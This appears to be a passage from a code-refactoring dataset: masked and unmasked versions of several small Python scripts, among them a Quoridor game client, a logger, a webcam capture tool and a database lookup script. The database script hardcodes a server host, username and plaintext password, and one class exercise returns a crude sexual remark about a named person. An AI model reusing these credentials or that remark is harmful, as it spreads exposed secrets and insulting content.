JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n elif COMMANDE.automatique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n print(JEU)\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n print(JEU)\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n elif COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n 
ID_PARTIE = DEBUTER[0]\n JEU.afficher()\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n else:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n print(JEU)\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n print(JEU)\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n",
"step-5": "'''Module main'''\nimport argparse\nimport api\nimport quoridor\nimport quoridorx\n\n\ndef analyser_commande():\n '''Analyseur de ligne de commande.'''\n parser = argparse.ArgumentParser(description='Jeu Quoridor - phase 3')\n\n parser.add_argument(\"idul\", help=\"IDUL du joueur.\")\n\n parser.add_argument(\"-l\", '--lister', action='store_true',\n help=\"Lister les identifiants de vos 20 dernières parties.\")\n # -a\n parser.add_argument(\"-a\", '--automatique', action='store_true',\n help=\"Activer le mode automatique.\")\n # -x\n parser.add_argument(\"-x\", '--graphique', action='store_true',\n help=\"Activer le mode graphique.\")\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n COMMANDE = analyser_commande()\n\n if COMMANDE.lister:\n print(api.lister_parties(COMMANDE.idul))\n\n # Mode automatique avec graphique (commande : python main.py -ax idul)\n elif COMMANDE.automatique and COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n\n JEU.afficher()\n\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n\n JEU.afficher()\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n\n # Mode automatique (commande : python main.py -a idul)\n elif COMMANDE.automatique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n\n print(JEU)\n\n GAGNANT = True\n while GAGNANT:\n try:\n COUP = JEU.jouer_coup(1)\n\n JOUER = api.jouer_coup(ID_PARTIE, COUP[0], COUP[1])\n\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n\n print(JEU)\n except StopIteration as err:\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except 
RuntimeError as err:\n print(err)\n # Mode manuel avec graphique (commande : python main.py -x idul)\n elif COMMANDE.graphique:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridorx.QuoridorX(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n\n JEU.afficher()\n\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n\n OK_CHOIX = False\n\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n JEU.afficher()\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n\n # Mode manuel contre le serveur (commande : python main.py idul)\n else:\n DEBUTER = api.débuter_partie(COMMANDE.idul)\n JEU = quoridor.Quoridor(DEBUTER[1]['joueurs'], DEBUTER[1]['murs'])\n ID_PARTIE = DEBUTER[0]\n\n print(JEU)\n\n GAGNANT = True\n while GAGNANT:\n OK_CHOIX = True\n while OK_CHOIX:\n CHOIX_COUP = input('Choisir votre coup(\"D\",\"MH\", \"MV\"): ')\n POS = input('Entrer les coordonnées (x,y): ')\n\n try:\n JOUER = api.jouer_coup(ID_PARTIE, CHOIX_COUP, POS)\n\n OK_CHOIX = False\n JEU.liste_joueurs = JOUER['joueurs']\n JEU.liste_murs = JOUER['murs']\n\n print(JEU)\n except StopIteration as err:\n OK_CHOIX = False\n GAGNANT = False\n print(f'Le gagnant est: {err}')\n except RuntimeError as err:\n print(err)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
import argparse
import pymssql
import json
#get the lcmMediaId from DB.
def getMediaId(contentProviderMediaName):
#test db
conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user='TravCatalog', password='travel', database='LodgingCatalogMaster_Phoenix')
#prod db
#conn = pymssql.connect(host='LodgingCatalogMaster.ch.expeso.com', user='TravCatalog', password='travel', database='LodgingCatalogMaster_Phoenix')
cur = conn.cursor()
cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',contentProviderMediaName)
row = cur.fetchone()
mediaid = None
while row:
mediaid =row[0]
break
return mediaid
def main(messages_file, records):
print ('> Messages: %s; Records: %d' % (messages_file, records))
message_number = 0
with open(messages_file, 'r') as msgs_file:
for message in msgs_file:
if message_number >= records and records > 0:
break
if message.startswith('> '):
continue
try:
jsonMsg = json.loads(message)
mediaid = getMediaId(jsonMsg['fileName'])
if(mediaid != None):
jsonMsg['domainFields']['lcmMediaId']=str(mediaid)
print (json.dumps(jsonMsg))
except (RuntimeError, TypeError, NameError):
print ('> %s error' % message_number)
message_number += 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'messages_file', help='File with the messages to write. One message per line'
)
parser.add_argument(
'--records', default=-1, help='Number of messages to read'
)
args = parser.parse_args()
main(args.messages_file, int(args.records))
|
normal
|
{
"blob_id": "a5b7f565a1797e5f326bcf26ff7c8ad2469dca70",
"index": 7442,
"step-1": "<mask token>\n\n\ndef getMediaId(contentProviderMediaName):\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user=\n 'TravCatalog', password='travel', database=\n 'LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',\n contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid = row[0]\n break\n return mediaid\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getMediaId(contentProviderMediaName):\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user=\n 'TravCatalog', password='travel', database=\n 'LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',\n contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid = row[0]\n break\n return mediaid\n\n\ndef main(messages_file, records):\n print('> Messages: %s; Records: %d' % (messages_file, records))\n message_number = 0\n with open(messages_file, 'r') as msgs_file:\n for message in msgs_file:\n if message_number >= records and records > 0:\n break\n if message.startswith('> '):\n continue\n try:\n jsonMsg = json.loads(message)\n mediaid = getMediaId(jsonMsg['fileName'])\n if mediaid != None:\n jsonMsg['domainFields']['lcmMediaId'] = str(mediaid)\n print(json.dumps(jsonMsg))\n except (RuntimeError, TypeError, NameError):\n print('> %s error' % message_number)\n message_number += 1\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef getMediaId(contentProviderMediaName):\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user=\n 'TravCatalog', password='travel', database=\n 'LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',\n contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid = row[0]\n break\n return mediaid\n\n\ndef main(messages_file, records):\n print('> Messages: %s; Records: %d' % (messages_file, records))\n message_number = 0\n with open(messages_file, 'r') as msgs_file:\n for message in msgs_file:\n if message_number >= records and records > 0:\n break\n if message.startswith('> '):\n continue\n try:\n jsonMsg = json.loads(message)\n mediaid = getMediaId(jsonMsg['fileName'])\n if mediaid != None:\n jsonMsg['domainFields']['lcmMediaId'] = str(mediaid)\n print(json.dumps(jsonMsg))\n except (RuntimeError, TypeError, NameError):\n print('> %s error' % message_number)\n message_number += 1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('messages_file', help=\n 'File with the messages to write. One message per line')\n parser.add_argument('--records', default=-1, help=\n 'Number of messages to read')\n args = parser.parse_args()\n main(args.messages_file, int(args.records))\n",
"step-4": "import argparse\nimport pymssql\nimport json\n\n\ndef getMediaId(contentProviderMediaName):\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user=\n 'TravCatalog', password='travel', database=\n 'LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',\n contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid = row[0]\n break\n return mediaid\n\n\ndef main(messages_file, records):\n print('> Messages: %s; Records: %d' % (messages_file, records))\n message_number = 0\n with open(messages_file, 'r') as msgs_file:\n for message in msgs_file:\n if message_number >= records and records > 0:\n break\n if message.startswith('> '):\n continue\n try:\n jsonMsg = json.loads(message)\n mediaid = getMediaId(jsonMsg['fileName'])\n if mediaid != None:\n jsonMsg['domainFields']['lcmMediaId'] = str(mediaid)\n print(json.dumps(jsonMsg))\n except (RuntimeError, TypeError, NameError):\n print('> %s error' % message_number)\n message_number += 1\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('messages_file', help=\n 'File with the messages to write. One message per line')\n parser.add_argument('--records', default=-1, help=\n 'Number of messages to read')\n args = parser.parse_args()\n main(args.messages_file, int(args.records))\n",
"step-5": "#!/usr/bin/env python\nimport argparse\nimport pymssql\nimport json\n\n#get the lcmMediaId from DB.\ndef getMediaId(contentProviderMediaName):\n #test db\n conn = pymssql.connect(host='CHELLSSSQL23.karmalab.net', user='TravCatalog', password='travel', database='LodgingCatalogMaster_Phoenix')\n #prod db\n #conn = pymssql.connect(host='LodgingCatalogMaster.ch.expeso.com', user='TravCatalog', password='travel', database='LodgingCatalogMaster_Phoenix')\n cur = conn.cursor()\n cur.execute('SELECT * FROM media WHERE contentprovidermedianame =%s',contentProviderMediaName)\n row = cur.fetchone()\n mediaid = None\n while row:\n mediaid =row[0]\n break\n return mediaid\n\ndef main(messages_file, records):\n print ('> Messages: %s; Records: %d' % (messages_file, records))\n message_number = 0\n with open(messages_file, 'r') as msgs_file:\n for message in msgs_file:\n if message_number >= records and records > 0:\n break\n if message.startswith('> '):\n continue\n try:\n jsonMsg = json.loads(message)\n mediaid = getMediaId(jsonMsg['fileName'])\n if(mediaid != None):\n jsonMsg['domainFields']['lcmMediaId']=str(mediaid)\n print (json.dumps(jsonMsg))\n except (RuntimeError, TypeError, NameError):\n print ('> %s error' % message_number)\n message_number += 1\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'messages_file', help='File with the messages to write. One message per line'\n )\n parser.add_argument(\n '--records', default=-1, help='Number of messages to read'\n )\n args = parser.parse_args()\n main(args.messages_file, int(args.records))\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
"""For logging training information to files."""
import os
def delete_log(file_path):
"""Delete a log file.
Args:
file_path: String, the full path to the log file.
Raises:
ValueError: if file not found.
"""
if os.path.exists(file_path):
print('Deleting log %s...' % file_path)
os.remove(file_path)
else:
raise ValueError("File %r doesn't exists - cannot delete." % file_path)
class Logger:
"""For logging information to file."""
def __init__(self, file_path, print_too=True, override=False):
"""Create a new Logger.
Args:
file_path: String, the full path to the target file.
print_too: Bool, whether or not to also print logger info to terminal.
override: Bool, whether or not to delete any old files.
"""
self.file_path = file_path
self.print_too = print_too
if override:
if os.path.exists(file_path):
print('Overriding - deleting previous log...')
os.remove(file_path)
os.makedirs(os.path.dirname(file_path), exist_ok=True)
def log(self, info):
with open(self.file_path, 'a') as file:
file.write('\n' + info)
if self.print_too:
print(info)
|
normal
|
{
"blob_id": "1355c3abfd2683f6dc869703fdb79a04e264099c",
"index": 3421,
"step-1": "<mask token>\n\n\nclass Logger:\n <mask token>\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-2": "<mask token>\n\n\nclass Logger:\n \"\"\"For logging information to file.\"\"\"\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-3": "<mask token>\n\n\ndef delete_log(file_path):\n \"\"\"Delete a log file.\n\n Args:\n file_path: String, the full path to the log file.\n\n Raises:\n ValueError: if file not found.\n \"\"\"\n if os.path.exists(file_path):\n print('Deleting log %s...' % file_path)\n os.remove(file_path)\n else:\n raise ValueError(\"File %r doesn't exists - cannot delete.\" % file_path\n )\n\n\nclass Logger:\n \"\"\"For logging information to file.\"\"\"\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-4": "<mask token>\nimport os\n\n\ndef delete_log(file_path):\n \"\"\"Delete a log file.\n\n Args:\n file_path: String, the full path to the log file.\n\n Raises:\n ValueError: if file not found.\n \"\"\"\n if os.path.exists(file_path):\n print('Deleting log %s...' % file_path)\n os.remove(file_path)\n else:\n raise ValueError(\"File %r doesn't exists - cannot delete.\" % file_path\n )\n\n\nclass Logger:\n \"\"\"For logging information to file.\"\"\"\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-5": "\"\"\"For logging training information to files.\"\"\"\nimport os\n\n\ndef delete_log(file_path):\n \"\"\"Delete a log file.\n\n Args:\n file_path: String, the full path to the log file.\n\n Raises:\n ValueError: if file not found.\n \"\"\"\n if os.path.exists(file_path):\n print('Deleting log %s...' % file_path)\n os.remove(file_path)\n else:\n raise ValueError(\"File %r doesn't exists - cannot delete.\" % file_path)\n\n\nclass Logger:\n \"\"\"For logging information to file.\"\"\"\n\n def __init__(self, file_path, print_too=True, override=False):\n \"\"\"Create a new Logger.\n\n Args:\n file_path: String, the full path to the target file.\n print_too: Bool, whether or not to also print logger info to terminal.\n override: Bool, whether or not to delete any old files.\n \"\"\"\n self.file_path = file_path\n self.print_too = print_too\n if override:\n if os.path.exists(file_path):\n print('Overriding - deleting previous log...')\n os.remove(file_path)\n os.makedirs(os.path.dirname(file_path), exist_ok=True)\n\n def log(self, info):\n with open(self.file_path, 'a') as file:\n file.write('\\n' + info)\n if self.print_too:\n print(info)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
from django.db import transaction
from ralph_scrooge.models import ProfitCenter
from ralph_scrooge.plugins import plugin_runner
from ralph_scrooge.plugins.collect.utils import get_from_ralph
logger = logging.getLogger(__name__)
@transaction.atomic
def update_profit_center(pc):
profit_center, created = ProfitCenter.objects.get_or_create(
ralph3_id=pc['id'],
defaults=dict(
name=pc['name'],
)
)
profit_center.name = pc['name']
profit_center.description = pc['description']
profit_center.save()
return created
@plugin_runner.register(chain='scrooge')
def ralph3_profit_center(**kwargs):
new_pc = total = 0
for pc in get_from_ralph("profit-centers", logger):
created = update_profit_center(pc)
if created:
new_pc += 1
total += 1
return True, '{} new profit center(s), {} updated, {} total'.format(
new_pc,
total - new_pc,
total,
)
|
normal
|
{
"blob_id": "d3f52d4713ba4b7b4cd736b26809968e259be63c",
"index": 6883,
"step-1": "<mask token>\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-2": "<mask token>\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport logging\nfrom django.db import transaction\nfrom ralph_scrooge.models import ProfitCenter\nfrom ralph_scrooge.plugins import plugin_runner\nfrom ralph_scrooge.plugins.collect.utils import get_from_ralph\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom django.db import transaction\n\nfrom ralph_scrooge.models import ProfitCenter\nfrom ralph_scrooge.plugins import plugin_runner\nfrom ralph_scrooge.plugins.collect.utils import get_from_ralph\n\n\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(\n ralph3_id=pc['id'],\n defaults=dict(\n name=pc['name'],\n )\n )\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph(\"profit-centers\", logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(\n new_pc,\n total - new_pc,\n total,\n )\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
"""
- Define a new class Student which is derived from Human and has:
grade field.
do_hobby - print 'dancing' or some another hobby
"""
import andy.Lesson_7.exercise_1
class Student(andy.Lesson_7.exercise_1.Human):
def __init__(self, firstname, lastname, grade):
super().__init__(firstname, lastname)
self.grade = grade
def do_hobby(self):
return self.full_name + " ebet Petra Kovarskogo"
a = Student("Artem", "Nizhnik", "Shkolnik")
print(a.do_hobby())
print(a.grade)
|
normal
|
{
"blob_id": "497f56891670f635feff983058e86055e54be493",
"index": 2618,
"step-1": "<mask token>\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + ' ebet Petra Kovarskogo'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + ' ebet Petra Kovarskogo'\n\n\n<mask token>\nprint(a.do_hobby())\nprint(a.grade)\n",
"step-3": "<mask token>\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + ' ebet Petra Kovarskogo'\n\n\na = Student('Artem', 'Nizhnik', 'Shkolnik')\nprint(a.do_hobby())\nprint(a.grade)\n",
"step-4": "<mask token>\nimport andy.Lesson_7.exercise_1\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + ' ebet Petra Kovarskogo'\n\n\na = Student('Artem', 'Nizhnik', 'Shkolnik')\nprint(a.do_hobby())\nprint(a.grade)\n",
"step-5": "\"\"\"\n- Define a new class Student which is derived from Human and has:\n grade field.\n do_hobby - print 'dancing' or some another hobby\n\"\"\"\nimport andy.Lesson_7.exercise_1\n\n\nclass Student(andy.Lesson_7.exercise_1.Human):\n\n def __init__(self, firstname, lastname, grade):\n super().__init__(firstname, lastname)\n self.grade = grade\n\n def do_hobby(self):\n return self.full_name + \" ebet Petra Kovarskogo\"\n\n\na = Student(\"Artem\", \"Nizhnik\", \"Shkolnik\")\nprint(a.do_hobby())\nprint(a.grade)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import glob
from collections import defaultdict
from stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset
data = defaultdict(list)
images = {}
for xml_path in glob.glob("./input/**/*.xml", recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
minimum = float("inf")
for cls in data:
total = sum([len(val) for val in data.values()])
print(f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})")
minimum = min([len(data[cls]), minimum])
# Extract images
extract_images_from_bbox_dict_for_training(images, output_dir="./data/")
# Split into dataset
split_dataset("./data/*", max_size=minimum, except_for_train=True)
|
normal
|
{
"blob_id": "41e642c4acb212470577ef43908a1dcf2e0f5730",
"index": 7159,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\n<mask token>\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-3": "<mask token>\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\nminimum = float('inf')\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-4": "import glob\nfrom collections import defaultdict\nfrom stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\nminimum = float('inf')\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-5": "import glob\nfrom collections import defaultdict\nfrom stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset\n\n\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob(\"./input/**/*.xml\", recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\n\nminimum = float(\"inf\")\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\")\n minimum = min([len(data[cls]), minimum])\n\n# Extract images\nextract_images_from_bbox_dict_for_training(images, output_dir=\"./data/\")\n\n# Split into dataset\nsplit_dataset(\"./data/*\", max_size=minimum, except_for_train=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import cv2
# open webcam (웹캠 열기)
webcam = cv2.VideoCapture(0)
if not webcam.isOpened():
print("Could not open webcam")
exit()
sample_num = 0
captured_num = 0
# loop through frames
while webcam.isOpened():
# read frame from webcam
status, frame = webcam.read()
sample_num = sample_num + 1
if not status:
break
# display output
cv2.imshow("captured frames", frame)
if sample_num == 4:
captured_num = captured_num + 1
cv2.imwrite('./images/img'+str(captured_num)+'.jpg', frame)
sample_num = 0
# press "Q" to stop
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# release resources
webcam.release()
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "856a27e953a6b4e1f81d02e00717a8f95a7dea5f",
"index": 7790,
"step-1": "<mask token>\n",
